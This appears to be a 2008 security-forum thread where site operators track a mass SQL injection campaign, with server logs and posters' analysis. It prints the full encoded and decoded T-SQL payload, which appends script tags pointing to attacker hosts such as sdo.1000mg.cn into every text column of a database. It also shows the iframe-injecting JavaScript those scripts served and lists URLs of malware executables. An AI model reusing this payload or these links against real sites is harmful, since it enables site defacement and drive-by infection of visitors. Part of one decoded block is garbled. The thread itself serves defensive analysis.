xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56 0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"
Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56 0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"
The link is returning a 500 Internal server error.

In all we have seen this same sql injection attempt from 35 indivdual IPs today.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on August 07, 2008, 02:18:45 pm: also downloaded.

Quote
hxxp://www.plgou.com/comine/new2.exe
hxxp://www.plgou.com/comine/b.exe
Title: Re: SQL Injected jscript sites
Post by: Serg on August 07, 2008, 06:35:00 pm: Quote from: Orac on August 07, 2008, 11:11:54 am
One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56 0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"
Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56 0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"
The link is returning a 500 Internal server error.

In all we have seen this same sql injection attempt from 35 indivdual IPs today.
Try google to count infected forum posts...
Title: Re: SQL Injected jscript sites
Post by: Orac on August 09, 2008, 10:38:21 am: Log entry, with IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39 +0000] "GET /rrpad/pad.xml?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"
decoded
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39 0000] "GET /rrpad/pad.xml?';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"
Code: [Select]
--11:24:09-- http://sdo.1000mg.cn/csrss/w.js => `w.js' Resolving sdo.1000mg.cn... 121.11.76.85 Connecting to sdo.1000mg.cn[121.11.76.85]:80... connected HTTP request sent, awaiting response... 200 OK

Code: [Select]
window.onerror=function(){return true;} if(typeof(js86eus)=="undefined") { var js86eus=1; var yesdata; yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>'); var nus=navigator.userLanguage.toUpperCase(); if(nus=="EN-US") { document.write("<iframe width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>"); }else{ document.write("<iframe width=100 height=0 src=http://www.plgou.com/kk/kk.htm></iframe>"); } } function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} function y_g(name) {var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;} function cc_k() {var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}
The iframe link to count41.51yes.com returns a 500 internal server error, both iframe links too plgou.com are active.

In all we saw this script from 236 indivdual IPs today.
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 09, 2008, 10:44:05 am: Code: [Select]
http://www.plgou.com/kk/rondll32.exe#version=1,0,0,1
for direct link to file, gonna run it in a sec when i get vmware back up and running

-Brian

different file here also
Code: [Select]
http://www.plgou.com/csrss/rondll32.exe
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 09, 2008, 01:06:15 pm: ok the KK rondll file drops 2 files in the windows font folders

the other one(csrss one) downloads these two
Code: [Select]
http://www.plgou.com/comine/sl.exe http://www.plgou.com/comine/server.exemore to come!

Code: [Select]
http://www.plgou.com/csrss/index.html
which lists
Code: [Select]
2008-08-08 http://www.plgou.com/comine/sss.exe 2008-08-08 http://www.plgou.com/comine/sl.exe 2008-08-08 http://www.plgou.com/comine/server.exe
Sl.exe won't run on vista, stupid vista :(

-Brian
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 12, 2008, 08:20:05 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on August 15, 2008, 02:48:13 pm: Quote
hxxp://a.mm861.com/1.js
<_SCRIPT src="hxxp://a.mm861.com/1.js"></_SCRIPT>
<_IFRAME src="hxxp://www.6980982jh.com/tt1.html" width=0 height=0></_IFRAME>
<_IFRAME src="hxxp://www.mydearsister.net/css/ad.htm" width=50 height=0></_IFRAME>
<_IFRAME src="hxxp://www.80man.com.cn/index.htm" width=0 height=0></_IFRAME>

Thank you Malzilla
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 15, 2008, 04:41:27 pm: from that js file above

Code: [Select]
51js.th-club.com/1794424.js 51js.th-club.com/2039774.js 51js.th-club.com/2068633.js 51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2039774&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.mydearsister.net/css/ad.htm 51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2068633&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.80man.com.cn/index.htm 51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=31&id=1794424&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.6980982jh.com/tt1.html count14.51yes.com/click.aspx?id=146836447&logo=1 count14.51yes.com/count1.gif count14.51yes.com/sa.aspx?id=146836447&refe=http%3A//www.6980982jh.com/tt1.html&location=http%3A//www.rigoogle.com/&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29 count4.51yes.com/click.aspx?id=48870943&logo=1 count4.51yes.com/count1.gif count4.51yes.com/sa.aspx?id=48870943&refe=&location=http%3A//www.6980982jh.com/tt1.html&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29 icon.ajiang.net/icon_0.gif www.6980982jh.com/favicon.ico www.6980982jh.com/tt1.html www.80man.com.cn/14.htm www.80man.com.cn/4561.swf www.80man.com.cn/WIN%209,0,47,0i.swf www.80man.com.cn/css/css.exe www.80man.com.cn/favicon.ico www.80man.com.cn/flash.htm www.80man.com.cn/index.htm www.80man.com.cn/kkk.exe www.80man.com.cn/office.htm www.80man.com.cn/re10.htm www.80man.com.cn/re11.htm www.mydearsister.net/css/ad.htm www.mydearsister.net/css/dadongi.asp?dadong=WIN%209,0,47,0 www.mydearsister.net/css/dadongi.swf www.mydearsister.net/css/dd.exe www.mydearsister.net/css/dx.exe www.mydearsister.net/css/index.htm www.mydearsister.net/css/kr.exe www.mydearsister.net/css/list.txt www.mydearsister.net/css/list.txt www.mydearsister.net/css/mx.exe www.mydearsister.net/css/ress.htm www.mydearsister.net/favicon.ico www.mydearsister.net/u.exe www.mydearsister.netPOST/Count/Count.asp(application/x-www-form-urlencoded) www.rigoogle.com/ www.rigoogle.com/flash.htm www.rigoogle.com/help.exe www.rigoogle.com/i47.swf www.rigoogle.com/issf.html www.rigoogle.com/office.htm www.rigoogle.com/re10.htm www.rigoogle.com/swfobject.js
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 16, 2008, 09:31:51 am: Thank you.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 16, 2008, 10:54:45 am: Sample log out of a total of 398 seperate injection attempts involving the same script within the last 24 hours, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [16/Aug/2008:03:00:47 +0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"
Decoded, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx- - [16/Aug/2008:03:00:47 0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www3.800mg.cn/csrss/w.js"></script> </script> <script src="http://js.users.51.la/2063988.js"></script> <iframe src=flash.htm width=100 height=10></iframe> <iframe src=06014.html width=100 height=10></iframe> <iframe src=yahoo.htm width=100 height=10></iframe> <iframe src=office.htm width=100 height=10></iframe> <iframe src=ksx.htm width=100 height=10></iframe> <script src='http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288' language='javaScript' charset='gb2312'></script> <script language="JavaScript">  </script>

First iframe link
Code: [Select]
--11:24:21-- http://count41.51yes.com/sa.aspx => `sa.aspx' Resolving count41.51yes.com... 222.173.188.45 Connecting to count41.51yes.com[222.173.188.45]:80... connected HTTP request sent, awaiting response... 200 OK

Code: [Select]
<html> <head> <title>ÔËÐÐÊ±´íÎó</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Lucida Console";font-size: .9em} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } </style> </head> <body bgcolor="white"> <span><H1>¡°/¡±Ó¦ÓÃ³ÌÐòÖÐµÄ·þÎñÆ÷´íÎó¡£<hr width=100% size=1 color=silver></H1> <h2> <i>ÔËÐÐÊ±´íÎó</i> </h2></span> <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif "> <b> ËµÃ÷: </b>·þÎñÆ÷ÉÏ³öÏÖÓ¦ÓÃ³ÌÐò´íÎó¡£´ËÓ¦ÓÃ³ÌÐòµÄµ±Ç°×Ô¶¨Òå´íÎóÉèÖÃ½ûÖ¹Ô¶³Ì²é¿´Ó¦ÓÃ³ÌÐò´íÎóµÄÏêÏ¸ÐÅÏ¢(³öÓÚ°²È«ÔÒò)¡£µ«¿ÉÒÔÍ¨¹ýÔÚ±¾µØ·þÎñÆ÷¼ÆËã»úÉÏÔËÐÐµÄä¯ÀÀÆ÷²é¿´¡£ <br><br> <b>ÏêÏ¸ÐÅÏ¢:</b> ÈôÒªÊ¹ËûÈËÄÜ¹»ÔÚÔ¶³Ì¼ÆËã»úÉÏ²é¿´´ËÌØ¶¨´íÎóÐÅÏ¢µÄÏêÏ¸ÐÅÏ¢£¬ÇëÔÚÎ»ÓÚµ±Ç° Web Ó¦ÓÃ³ÌÐò¸ùÄ¿Â¼ÏÂµÄ¡°web.config¡±ÅäÖÃÎÄ¼þÖÐ´´½¨Ò»¸ö <customErrors> ±ê¼Ç¡£È»ºóÓ¦½«´Ë <customErrors> ±ê¼ÇµÄ¡°mode¡±ÊôÐÔÉèÖÃÎª¡°Off¡±¡£<br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>  <configuration> <system.web> <customErrors mode="Off"/> </system.web> </configuration></pre></code> </td> </tr> </table> <br> <b>×¢ÊÍ:</b> Í¨¹ýÐÞ¸ÄÓ¦ÓÃ³ÌÐòµÄ <customErrors> ÅäÖÃ±ê¼ÇµÄ¡°defaultRedirect¡±ÊôÐÔ£¬Ê¹Ö®Ö¸Ïò×Ô¶¨Òå´íÎóÒ³µÄ URL£¬¿ÉÒÔÓÃ×Ô¶¨Òå´íÎóÒ³Ìæ»»Ëù¿´µ½µÄµ±Ç°´íÎóÒ³¡£<br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>  <configuration> <system.web> <customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/> </system.web> </configuration></pre></code> </td> </tr> </table> <br> </body> </html>

Secondary iframe
Code: [Select]
--11:29:33-- http://js.users.51.la/2063988.js => `2063988.js' Resolving js.users.51.la... 202.104.236.224 Connecting to js.users.51.la[202.104.236.224]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
document.write ('<a href="http://www.51.la/?2063988" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n'); // A Popular Free Statistics Service for 100 000+ Webmasters. window.onerror=function(){return true}; document.write ('<script>var a3988tf="51la";var a3988pu="";var a3988pf="51la";var a3988su=window.location;var a3988sf=document.referrer;var a3988of="";var a3988op="";var a3988ops=1;var a3988ot=1;var a3988d=new Date();var a3988color="";if (navigator.appName=="Netscape"){a3988color=screen.pixelDepth;} else {a3988color=screen.colorDepth;}<\/script><script>a3988tf=top.document.referrer;<\/script><script>a3988pu =window.parent.location;<\/script><script>a3988pf=window.parent.document.referrer;<\/script><script>a3988ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3988ops=(a3988ops==null)?1: (parseInt(unescape((a3988ops)[2]))+1);var a3988oe =new Date();a3988oe.setTime(a3988oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3988ops+ ";path=/;expires="+a3988oe.toGMTString();a3988ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3988ot==null){a3988ot=1;}else{a3988ot=parseInt(unescape((a3988ot)[2])); a3988ot=(a3988ops==1)?(a3988ot+1):(a3988ot);}a3988oe.setTime(a3988oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3988ot+";path=/;expires="+a3988oe.toGMTString();<\/script><script>a3988of=a3988sf;if(a3988pf!=="51la"){a3988of=a3988pf;}if(a3988tf!=="51la"){a3988of=a3988tf;}a3988op=a3988pu;try{lainframe}catch(e){a3988op=a3988su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2063988&tpages=\'+a3988ops+\'&ttimes=\'+a3988ot+\'&tzone=\'+(0-a3988d.getTimezoneOffset()/60)+\'&tcolor=\'+a3988color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3988of)+\'&vpage=\'+escape(a3988op)+\'" \/>\');<\/script>');

Script link
Code: [Select]
--11:35:17-- http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288 => `stat.php?id=1005288&web_id=1005288' Resolving s135.cnzz.com... 219.232.241.139 Connecting to s135.cnzz.com[219.232.241.139]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
function gv_cnzz(of){ var es = document.cookie.indexOf(";",of); if(es==-1) es=document.cookie.length; return unescape(document.cookie.substring(of,es)); } function gc_cnzz(n){ var arg=n+"="; var alen=arg.length; var clen=document.cookie.length; var i=0; while(i<clen){ var j=i+alen; if(document.cookie.substring(i,j)==arg) return gv_cnzz(j); i=document.cookie.indexOf(" ",i)+1; if(i==0) break; } return -1; } var ed=new Date(); var now=parseInt(ed.getTime()); var agt=navigator.userAgent.toLowerCase(); var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.38678100 1218883460'; var cnzz_a=gc_cnzz("cnzz_a1005288"); if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1; else cnzz_a=0; var rt=parseInt(gc_cnzz("rtime")); var lt=parseInt(gc_cnzz("ltime")); var eid=gc_cnzz("cnzz_eid"); if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer; if(lt<1000000){rt=0;lt=0;} if(rt<1) rt=0; if(((now-lt)>500*86400)&&(lt>0)) rt++; data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height); document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1005288" target=_blank title="Õ¾³¤Í³¼Æ">Õ¾³¤Í³¼Æ</a>'); document.write('<img src="http://222.77.187.108/stat.htm?id=1005288'+data+'" border=0 width=0 height=0>'); var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds()); ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60)); document.cookie="cnzz_a1005288="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/"; ed.setTime(now+1000*86400*182); document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/"; document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/"; document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 16, 2008, 05:29:36 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 17, 2008, 10:59:07 am: Further to my post August 16, 2008 we had a total of 2,051 injection attempts involving this same script in the last 24 hours
Title: Re: SQL Injected jscript sites
Post by: Orac on August 18, 2008, 09:26:15 am: With reference to my post August 16, 2008 we had a total of 1552 injection attempts involving this same script in the last 24 hours.

The link is now returning a 500 internal server error.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 20, 2008, 09:59:36 am: New SQL injection attempt from sdo.1000mg.cn/csrss/w.js

Original encoded form
Code: [Select]
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207! 372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script 7! 7&3Ò&‡GG¢ò÷6FòãÖræ6âö77'72÷ræ§2#ãÂ÷67&—CãÂÒÒrrr”dUD4‚äU…Be$ôÒF&ÆUô7W'6÷"”åDòBÄ2TäB4Äõ4RF&ÆUô7W'6÷"DTÄÄô4DRF&ÆUô7W'6÷2
The link returns a 500 Internal server error.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 21, 2008, 11:11:43 am: New sql injection, weve seen 418 seperate injection attempts involving the script within the last 24 hours.

Sample Log entry, IP obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [20/Aug/2008:20:17:01 +0000] "GET /forums/index.php?showtopic=1440';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B